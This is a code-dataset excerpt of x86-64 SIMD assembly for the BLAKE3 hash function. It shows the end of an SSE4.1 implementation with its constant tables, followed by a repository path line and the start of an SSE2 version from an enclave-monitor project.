pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
mov eax, r13d
jne 9b
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
test esi, 0x2
je 3f
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
pinsrd xmm14, dword ptr [rsp+0x124], 1
pinsrd xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
pinsrd xmm3, eax, 3
pinsrd xmm11, eax, 3
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm12, xmmword ptr [ROT16+rip]
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm13, xmmword ptr [ROT8+rip]
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pblendw xmm13, xmm12, 0xCC
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
pblendw xmm12, xmm6, 0xC0
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pblendw xmm6, xmm5, 0xCC
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
pblendw xmm5, xmm14, 0xC0
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
movdqa xmm0, xmmword ptr [rsp+0x130]
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm2, xmmword ptr [rsp+0x120]
movdqu xmm3, xmmword ptr [rsp+0x118]
movdqu xmm4, xmmword ptr [rsp+0x128]
blendvps xmm1, xmm3, xmm0
blendvps xmm2, xmm4, xmm0
movdqa xmmword ptr [rsp+0x110], xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm3, xmm13
pinsrd xmm3, eax, 3
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
blake3_compress_in_place_sse41:
_blake3_compress_in_place_sse41:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
movups xmmword ptr [rdi], xmm0
movups xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
blake3_compress_xof_sse41:
_blake3_compress_xof_sse41:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
movdqu xmm4, xmmword ptr [rdi]
movdqu xmm5, xmmword ptr [rdi+0x10]
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm2, xmm4
pxor xmm3, xmm5
movups xmmword ptr [r9], xmm0
movups xmmword ptr [r9+0x10], xmm1
movups xmmword ptr [r9+0x20], xmm2
movups xmmword ptr [r9+0x30], xmm3
ret
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85
.long 0x3C6EF372, 0xA54FF53A
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
ADD0:
.long 0, 1, 2, 3
ADD1:
.long 4, 4, 4, 4
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 64, 64, 64, 64
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
|
mit-enclaves/argos-monitor | 68,858 | C/libraries/sdktyche/loader/blake3_sse2_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse2
.global _blake3_hash_many_sse2
.global blake3_compress_in_place_sse2
.global _blake3_compress_in_place_sse2
.global blake3_compress_xof_sse2
.global _blake3_compress_xof_sse2
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse2:
blake3_hash_many_sse2:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
